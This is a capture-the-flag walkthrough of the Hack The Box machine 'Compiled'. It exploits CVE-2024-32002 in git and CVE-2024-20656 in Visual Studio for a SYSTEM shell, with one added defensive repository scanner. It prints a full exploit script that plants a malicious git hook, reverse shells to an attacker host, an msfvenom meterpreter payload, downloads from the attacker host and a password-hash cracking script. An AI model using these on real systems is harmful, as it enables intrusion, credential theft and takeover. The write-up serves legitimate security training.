Hackthebox: Compiled

Foued SAIDI

Overview

Compiled is a medium-difficulty machine from Hack The Box. It is pretty straightforward, as it chains two CVEs from 2024 in order to pwn it. First we use CVE-2024-32002, a remote code execution bug in git: a recursive clone of a crafted repository, on a case-insensitive filesystem with symlinks enabled, lets a submodule checkout write a hook into the .git/ directory, and git then runs that hook during the clone. Later we exploit CVE-2024-20656, a local privilege escalation in Visual Studio's VSStandardCollectorService150 service, which is installed to run as NT AUTHORITY\SYSTEM, to get our privileged shell. Hope you enjoy it!

Compiled-info-card

Reconnaissance

PS C:\Users\0xkujen> nmap -A -Pn 10.129.253.115 
Starting Nmap 7.95 ( https://nmap.org ) at 2024-12-13 15:40 W. Central Africa Standard Time
Nmap scan report for 10.129.253.115
Host is up (1.6s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
3000/tcp open http Golang net/http server
| fingerprint-strings:
| GenericLines, Help, RTSPRequest:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Content-Type: text/html; charset=utf-8
| Set-Cookie: i_like_gitea=f629d85303be2590; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=3H-4uwqM0T21f96Y2AnD3O-Vdco6MTczNDEwMTM3NDY0NDIzNzMwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 13 Dec 2024 14:49:34 GMT
| <!DOCTYPE html>
| <html lang="en-US" class="theme-arc-green">
| <head>
| <meta name="viewport" content="width=device-width, initial-scale=1">
| <title>Git</title>
| <link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0Iiwic2hvcnRfbmFtZSI6IkdpdCIsInN0YXJ0X3VybCI6Imh0dHA6Ly9naXRlYS5jb21waWxlZC5odGI6MzAwMC8iLCJpY29ucyI6W3sic3JjIjoiaHR0cDovL2dpdGVhLmNvbXBpbGVkLmh0YjozMDAwL2Fzc2V0cy9pbWcvbG9nby5wbmciLCJ0eXBlIjoiaW1hZ2UvcG5nIiwic2l6ZXMiOiI1MTJ4NTEyIn0seyJzcmMiOiJodHRwOi8vZ2l0ZWEuY29tcGlsZWQuaHRiOjMwMDA
| HTTPOptions:
| HTTP/1.0 405 Method Not Allowed
| Allow: HEAD
| Allow: HEAD
| Allow: GET
| Cache-Control: max-age=0, private, must-revalidate, no-transform
| Set-Cookie: i_like_gitea=1f26abc6f135dbd0; Path=/; HttpOnly; SameSite=Lax
| Set-Cookie: _csrf=OvRjhGVT_QhYWSN-YXNnKLl5mBI6MTczNDEwMTM3ODc0MjY0ODgwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
| X-Frame-Options: SAMEORIGIN
| Date: Fri, 13 Dec 2024 14:49:38 GMT
|_ Content-Length: 0
|_http-title: Git
5000/tcp open http Werkzeug httpd 3.0.3 (Python 3.12.3)
|_http-server-header: Werkzeug/3.0.3 Python/3.12.3
|_http-title: Compiled - Code Compiling Services
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.95%I=7%D=12/13%Time=675C4815%P=i686-pc-windows-windows
<snip>

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 263.07 seconds

Only two ports answer: 3000 and 5000, both HTTP. Port 3000 is a Gitea instance (the session cookie is named i_like_gitea and the page title is Git) served by Go's net/http; port 5000 is a Python web application behind Werkzeug 3.0.3, titled "Compiled - Code Compiling Services".
Let’s discover!

Web Application - http://10.129.253.115:5000

Web App - Port 5000

The site accepts a Git repository URL and compiles the code it finds there, which means the server clones whatever repository we hand it. Sus, right?!
When I first pwned the machine I spent a lot of time on this feature. However, I got nowhere.

Web Application - http://10.129.253.115:3000

Navigating to the Gitea interface on port 3000, we found a couple of interesting repos after registering for an account:

Web App - Port 3000

CVE-2024-32002 - Richard

Taking a closer look at the Calculator repository, we can see this interesting info:

CVE-2024-32002

Doing some ninja lookup on the mighty Google, I stumbled into this amazing explanation and overview of CVE-2024-32002, alongside this amazing PoC on GitHub.

LESSGERIT!

Having these two amazing resources, I just created a simple bash script that’s adequate to my needs:

#!/bin/bash
# Local git settings the PoC relies on: allow file:// submodule URLs,
# create real symlinks, and use "main" as the default branch name.
git config --global protocol.file.allow always
git config --global core.symlinks true
git config --global init.defaultBranch main

# Start clean. Both repos must already exist (empty) under the kujen account on Gitea.
rm -rf repo1 repo2

# repo1 carries the hook. It is checked out as a submodule later and, on the
# target, lands inside .git/modules/x/, so y/hooks/ becomes that submodule's
# hooks directory and post-checkout fires at the end of the checkout.
git clone http://gitea.compiled.htb:3000/kujen/repo1.git
cd repo1
mkdir -p y/hooks

cat > y/hooks/post-checkout <<EOF
#!bin/sh.exe
powershell -e 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
EOF

chmod +x y/hooks/post-checkout
git add y/hooks/post-checkout
git commit -m "post-checkout"
git push
cd ..

# repo2 is what the target clones. The submodule name "x/y" puts its git dir at
# .git/modules/x/y, while the checkout path A/modules/x resolves, through the
# symlink added below, to .git/modules/x on a case-insensitive filesystem.
git clone http://gitea.compiled.htb:3000/kujen/repo2.git
cd repo2
git submodule add --name x/y "http://gitea.compiled.htb:3000/kujen/repo1.git" A/modules/x
git commit -m "add-submodule"

# Add a symlink "a" -> ".git" straight into the index (mode 120000) so the
# working tree never needs a real symlink to .git.
printf ".git" > dotgit.txt
git hash-object -w --stdin < dotgit.txt > dot-git.hash
printf "120000 %s 0\ta\n" "$(cat dot-git.hash)" > index.info
git update-index --index-info < index.info
git commit -m "add-symlink"
git push

You can put whatever you want into the post-checkout file as your reverse shell script. I usually use the PowerShell Base64 payload from revshells.com. You might do that as well :)
We run the script:

kujen@kujen:~$ ./exploit.sh
Cloning into 'repo1'...
warning: You appear to have cloned an empty repository.
[main (root-commit) c5d01ff] post-checkout
1 file changed, 2 insertions(+)
create mode 100755 y/hooks/post-checkout
Username for 'http://gitea.compiled.htb:3000': kujen
Password for 'http://kujen@gitea.compiled.htb:3000':
Enumerating objects: 5, done.
Counting objects: 100% (5/5), done.
Delta compression using up to 16 threads
Compressing objects: 100% (2/2), done.
Writing objects: 100% (5/5), 910 bytes | 910.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://gitea.compiled.htb:3000/kujen/repo1.git
* [new branch] main -> main
Cloning into 'repo2'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (3/3), done.
Cloning into '/home/kujen/repo2/A/modules/x'...
remote: Enumerating objects: 5, done.
remote: Counting objects: 100% (5/5), done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 5 (delta 0), reused 0 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (5/5), done.
[main bf81e43] add-submodule
2 files changed, 4 insertions(+)
create mode 100644 .gitmodules
create mode 160000 A/modules/x
On branch main
Your branch is ahead of 'origin/main' by 1 commit.
(use "git push" to publish your local commits)

Untracked files:
(use "git add <file>..." to include in what will be committed)
dot-git.hash
dotgit.txt
index.info

nothing added to commit but untracked files present (use "git add" to track)
Username for 'http://gitea.compiled.htb:3000': kujen
Password for 'http://kujen@gitea.compiled.htb:3000':
Enumerating objects: 6, done.
Counting objects: 100% (6/6), done.
Delta compression using up to 16 threads
Compressing objects: 100% (3/3), done.
Writing objects: 100% (5/5), 456 bytes | 456.00 KiB/s, done.
Total 5 (delta 0), reused 0 (delta 0), pack-reused 0
remote: . Processing 1 references
remote: Processed 1 references in total
To http://gitea.compiled.htb:3000/kujen/repo2.git
b6ea876..bf81e43 main -> main

Now we just need to hand the second repo to the compile service, which clones it recursively and thereby runs our hook. We head over to http://compiled.htb:5000 and submit http://gitea.compiled.htb:3000/kujen/repo2.git; looking at our terminal, we get a callback 8)

PS C:\Users\0xkujen> nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.253.115] 54524
whoami
Richard
PS C:\Users\Richard\source\cloned_repos\3l6jy\.git\modules\x>
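With the callback in hand, it is worth looking at what the compile service (or any CI job that runs git clone --recursive on untrusted repositories) could have checked before cloning. The following Python script is an added example written for this post; it is not code from the original write-up or from the linked PoC. It takes a repository's tree as git ls-tree -r HEAD lists it (mode and path, plus the blob content for symlinks, which git cat-file -p prints) and the text of .gitmodules, and flags the ingredients the exploit script above relies on: a symlink whose target is .git, a submodule path that runs through that symlink when compared case-insensitively, and a submodule whose git dir (.git/modules/<name>) ends up inside its own checkout, so that its hooks/ directory is attacker-controlled. It also reports executable files under a hooks/ directory, which is what repo1 carries. The tree entries and .gitmodules text are constructed inline to mirror repo1 and repo2; the class and function names are my own.

```python
"""Pre-clone scanner for CVE-2024-32002-style repositories (added example)."""
import posixpath
import re
from dataclasses import dataclass

SYMLINK, SUBMODULE, EXEC_FILE = "120000", "160000", "100755"


@dataclass
class TreeEntry:
    """One row of `git ls-tree -r HEAD`. `target` holds the symlink's blob
    content (what `git cat-file -p <hash>` prints) and is empty otherwise."""
    mode: str
    path: str
    target: str = ""


def parse_gitmodules(text):
    """Tiny .gitmodules reader: returns {submodule name: normalised path}."""
    subs, name = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        header = re.match(r'\[submodule\s+"(.+)"\]$', line)
        if header:
            name = header.group(1)
            continue
        option = re.match(r"path\s*=\s*(.+)$", line)
        if option and name is not None:
            subs[name] = posixpath.normpath(option.group(1))
    return subs


def inside_git_dir(path):
    norm = posixpath.normpath(path)
    return norm == ".git" or norm.startswith(".git/")


def resolve_symlink_target(link_path, target):
    """Where a relative symlink points, as a repository-relative path."""
    return posixpath.normpath(posixpath.join(posixpath.dirname(link_path), target))


def resolve_case_insensitive(path, symlinks):
    """Rewrite `path` the way a case-insensitive filesystem (NTFS by default)
    would when one of its leading components matches a symlink in the tree,
    comparing with casefold(). `symlinks` maps symlink path -> target."""
    parts = posixpath.normpath(path).split("/")
    by_fold = {p.casefold(): (p, t) for p, t in symlinks.items()}
    for i in range(1, len(parts) + 1):
        key = "/".join(parts[:i]).casefold()
        if key in by_fold:
            link_path, target = by_fold[key]
            base = resolve_symlink_target(link_path, target)
            return posixpath.normpath(posixpath.join(base, *parts[i:]))
    return "/".join(parts)


def scan(entries, gitmodules_text=""):
    """Return a list of human-readable findings; an empty list means clean."""
    findings = []
    symlinks = {e.path: e.target for e in entries if e.mode == SYMLINK}

    for link_path, target in symlinks.items():
        if inside_git_dir(resolve_symlink_target(link_path, target)):
            findings.append(f"symlink {link_path} -> {target} resolves into .git/")

    for name, sub_path in parse_gitmodules(gitmodules_text).items():
        checkout = resolve_case_insensitive(sub_path, symlinks)
        gitdir = posixpath.normpath(posixpath.join(".git/modules", name))
        if inside_git_dir(checkout):
            findings.append(f"submodule '{name}' at {sub_path} would check out into {checkout}")
        if gitdir == checkout or gitdir.startswith(checkout + "/"):
            findings.append(f"submodule '{name}' checkout {checkout} contains its own git dir "
                            f"{gitdir}: hooks/ comes from the submodule content")

    for e in entries:
        if e.mode == EXEC_FILE and "hooks" in posixpath.dirname(e.path).split("/"):
            findings.append(f"executable {e.path} under a hooks/ directory")
    return findings


# Constructed samples mirroring repo2 (top level) and repo1 (the submodule).
REPO2_TREE = [
    TreeEntry(SYMLINK, "a", ".git"),
    TreeEntry("100644", ".gitmodules"),
    TreeEntry(SUBMODULE, "A/modules/x"),
]
REPO2_GITMODULES = (
    '[submodule "x/y"]\n'
    "\tpath = A/modules/x\n"
    "\turl = http://gitea.compiled.htb:3000/kujen/repo1.git\n"
)
REPO1_TREE = [TreeEntry(EXEC_FILE, "y/hooks/post-checkout")]
# A benign repository: its symlink and submodule have nothing to do with .git.
BENIGN_TREE = [
    TreeEntry("100644", "README.md"),
    TreeEntry(SYMLINK, "docs/latest", "v2"),
    TreeEntry(SUBMODULE, "lib/foo"),
]
BENIGN_GITMODULES = '[submodule "lib/foo"]\n\tpath = lib/foo\n\turl = https://example.invalid/foo.git\n'

if __name__ == "__main__":
    for label, tree, mods in [("repo2", REPO2_TREE, REPO2_GITMODULES),
                              ("repo1", REPO1_TREE, ""),
                              ("benign", BENIGN_TREE, BENIGN_GITMODULES)]:
        print(f"{label}: {scan(tree, mods) or 'clean'}")
```

On the server side the same inputs come from git ls-tree -r and git cat-file -p run against the bare repository, so the check works before any working tree exists. It inspects one tree at a time, so it has to be applied to each submodule's tree as well (the repo1 sample is what that catches); the real fix remains a git build that carries the patch for CVE-2024-32002 (2.45.1 and its backports), together with not cloning untrusted repositories with core.symlinks enabled.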

Note the prompt in the callback above: the hook fired from inside .git\modules\x of the repository the service cloned, which is exactly where the submodule checkout landed. Now, as we usually do, let's look for database credentials; Gitea keeps its data under C:\Program Files\Gitea\data:

PS C:\program files\Gitea\data> ls


Directory: C:\program files\Gitea\data


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/22/2024 8:08 PM actions_artifacts
d----- 5/22/2024 8:08 PM actions_log
d----- 5/22/2024 8:08 PM attachments
d----- 5/22/2024 8:08 PM avatars
d----- 12/13/2024 4:14 PM gitea-repositories
d----- 5/22/2024 8:08 PM home
d----- 5/22/2024 8:08 PM indexers
d----- 5/22/2024 8:08 PM jwt
d----- 5/22/2024 8:08 PM lfs
d----- 5/22/2024 8:08 PM packages
d----- 5/22/2024 8:08 PM queues
d----- 5/22/2024 8:08 PM repo-archive
d----- 5/22/2024 8:08 PM repo-avatars
d----- 5/25/2024 10:40 PM sessions
d----- 5/24/2024 5:32 PM tmp
-a---- 12/13/2024 4:32 PM 2023424 gitea.db


We can see that we have a gitea.db file (Gitea's SQLite database). Let's transfer it over to our machine and open it with sqlite3:

sqlite> select * from user;
1|administrator|administrator||[email protected]|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||[email protected]|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||[email protected]|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||[email protected]|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|0|0|0|2|0||arc-green|0
6|kujen|kujen||[email protected]|0|enabled|0e484ec04d6b69b8970b7742caaf538def0c6f411c3158626ef0213981c0b66d4c94c62e333361a2006d31d28fc7cdf312cf|pbkdf2$50000$50|0|0|0||0|||e23da4d7e550566fa29c210202f22d6d|6b5342ba86af1a0b3615b84f849f63aa|en-US||1722107387|1722174569|1722174569|0|-1|1|0|0|0|0|1|0||[email protected]|0|0|0|0|8|0|0|0|0||arc-green|0
sqlite>

We can see multiple hashes. The column after each hash reads pbkdf2$50000$50, i.e. PBKDF2-HMAC-SHA256 with 50,000 iterations and a 50-byte derived key; the per-user salt is the second 32-hex-character value that follows it (the first one is the rands column). The crackable one is Emily's (really lame password tho :'( )
For some reason I was not able to crack the hash using hashcat (mode 10900) due to its complexity. However, I did create my own decryptor for it (thanks ChatGPT, really <3):

#!/usr/bin/env python3
# Offline dictionary attack on a Gitea PBKDF2 password hash. The user row stores
# passwd (hex), passwd_hash_algo ("pbkdf2$<iterations>$<key length>") and a hex salt.
import binascii
import hashlib

# Values copied from emily's row in gitea.db above.
target_hash = '97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16'
salt_hex = '227d873cca89103cd83a976bdac52486'
algo = 'pbkdf2$50000$50'
dictionary_file = '/usr/share/wordlists/rockyou.txt'

# Gitea's pbkdf2 algorithm is PBKDF2-HMAC-SHA256; iterations and key length
# are taken from the passwd_hash_algo field rather than hard-coded.
_, iterations, dklen = algo.split('$')
iterations, dklen = int(iterations), int(dklen)
salt = binascii.unhexlify(salt_hex)
target_hash_bytes = binascii.unhexlify(target_hash)


def pbkdf2_hash(password, salt, iterations, dklen):
    return hashlib.pbkdf2_hmac('sha256', password, salt, iterations, dklen)


with open(dictionary_file, 'r', encoding='utf-8', errors='ignore') as f:
    for line in f:
        # Only strip the line ending, so candidates with leading/trailing spaces survive.
        password = line.rstrip('\r\n').encode('utf-8')
        if pbkdf2_hash(password, salt, iterations, dklen) == target_hash_bytes:
            print(f"Got it!!!! : {password}")
            break
    else:
        print("No match in the wordlist")

This script reads candidate passwords from rockyou.txt, hashes each one with PBKDF2-HMAC-SHA256 using the salt from Emily's row, 50,000 iterations and a 50-byte derived key, and compares the result with the stored hash. It is a plain dictionary attack, not decryption (PBKDF2 is one-way): when a candidate matches, it prints the password and stops.
And yes, our password was the usual 12345678 :’(

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 decryptor.py
Got it!!!! : b'12345678'

I can now get a shell as Emily using RunasCs.exe (its -r option expects host:port, as the first attempt shows):

PS C:\program files\Gitea\data> iwr 10.10.x.x/RunasCs.exe -outfile r.exe
PS C:\program files\Gitea\data> ./r.exe emily 12345678 powershell.exe -r 10.10.x.x 4444
[-] RunasCsException: Invalid remote value: 10.10.x.x
[-] Expected format: 'host:port'
PS C:\program files\Gitea\data> ./r.exe emily 12345678 powershell.exe -r 10.10.x.x:4444

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-1ed32e3$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 1204 created in background.
PS C:\program files\Gitea\data>

PS C:\Users\0xkujen> nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.x.x] from (UNKNOWN) [10.129.253.115] 54568
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Windows\system32> whoami
whoami
compiled\emily
PS C:\Windows\system32>

And we got our user flag:

PS C:\users\emily\desktop> cat user.txt
cat user.txt
c894415d6de81f******************
PS C:\users\emily\desktop>

Privilege Escalation to NT Authority\System - CVE-2024-20656

Taking a closer look at the machine, we can see that Visual Studio 2019 is installed:

PS C:\program files (x86)\Microsoft Visual Studio> ls
ls


Directory: C:\program files (x86)\Microsoft Visual Studio


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/29/2024 9:07 PM 2019
d----- 1/20/2024 1:57 AM Installer
d----- 1/20/2024 2:04 AM Shared

That immediately brings CVE-2024-20656 to mind (especially since the machine avatar is also the Visual Studio logo lol).
When Visual Studio is installed with C/C++ support, the VSStandardCollectorService150 service (the Diagnostics Hub Standard Collector) is created and configured to run as NT AUTHORITY\SYSTEM:

PS C:\program files (x86)\Microsoft Visual Studio> sc.exe qc VSStandardCollectorService150
sc.exe qc VSStandardCollectorService150
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VSStandardCollectorService150
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : "C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Visual Studio Standard Collector Service 150
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
PS C:\program files (x86)\Microsoft Visual Studio>

This article has a great overview of the vulnerability and the steps to reproduce it, and this amazing GitHub repo carries a PoC for the exploit, lessgo.
Building it takes a few steps:
  • Clone the project and open it in Visual Studio with the C/C++ package installed.
  • Change the cmd[] parameter to the path of Visual Studio's VSDiagnostics.exe on the target, as a C string: C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe
  • Change the source path in the CopyFile call to our reverse shell executable.
  • Build the project, run the resulting binary on the target, and BOOM.

CVE-2024-20656

Now we create a reverse shell executable with msfvenom, upload both files to the target and catch our reverse shell!

┌──(kali㉿kali)-[~/Desktop]
└─$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.x.x LPORT=4455 -f exe > aaa.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes

┌──(kali㉿kali)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.129.253.115 - - [13/Dec/2024 18:09:35] "GET /aaa.exe HTTP/1.1" 200 -
10.129.253.115 - - [13/Dec/2024 18:09:39] "GET /Expl.exe HTTP/1.1" 200 -

PS C:\tmp> iwr 10.10.x.x/aaa.exe -outfile aaa.exe
iwr 10.10.x.x/aaa.exe -outfile aaa.exe
PS C:\tmp> iwr 10.10.x.x/Expl.exe -outfile Expl.exe
iwr 10.10.x.x/Expl.exe -outfile Expl.exe
PS C:\tmp> ls
ls


Directory: C:\tmp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/13/2024 6:15 PM 73802 aaa.exe
-a---- 12/13/2024 6:15 PM 171008 Expl.exe
-a---- 12/13/2024 5:15 PM 51712 r.exe


PS C:\tmp> ./r.exe emily 12345678 "c:/tmp/Expl.exe"
./r.exe emily 12345678 "c:/tmp/Expl.exe"

[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \??\C:\cb8342cd-d86c-4883-bc0a-5686b8bc8cef created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \RPC Control created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \??\C:\cb8342cd-d86c-4883-bc0a-5686b8bc8cef created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\580c1976-923c-40e4-8279-1ce253ae3e99 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
PS C:\tmp>

And we are in!

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.x.x:4455
[*] Sending stage (177734 bytes) to 10.129.253.115
[*] Meterpreter session 1 opened (10.10.x.x:4455 -> 10.129.253.115:54603) at 2024-12-13 18:10:39 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > cat "c:/users/administrator/desktop/root.txt"
dfa95100a5e25f******************
meterpreter >

That was it for Compiled, hope you learned a thing or two :)
-0xkujen

  • Title: Hackthebox: Compiled
  • Author: Foued SAIDI
  • Created at : 2024-12-13 15:33:35
  • Updated at : 2024-12-13 18:21:03
  • Link: https://kujen5.github.io/2024/12/13/Hackthebox-Compiled/
  • License: This work is licensed under CC BY-NC-SA 4.0.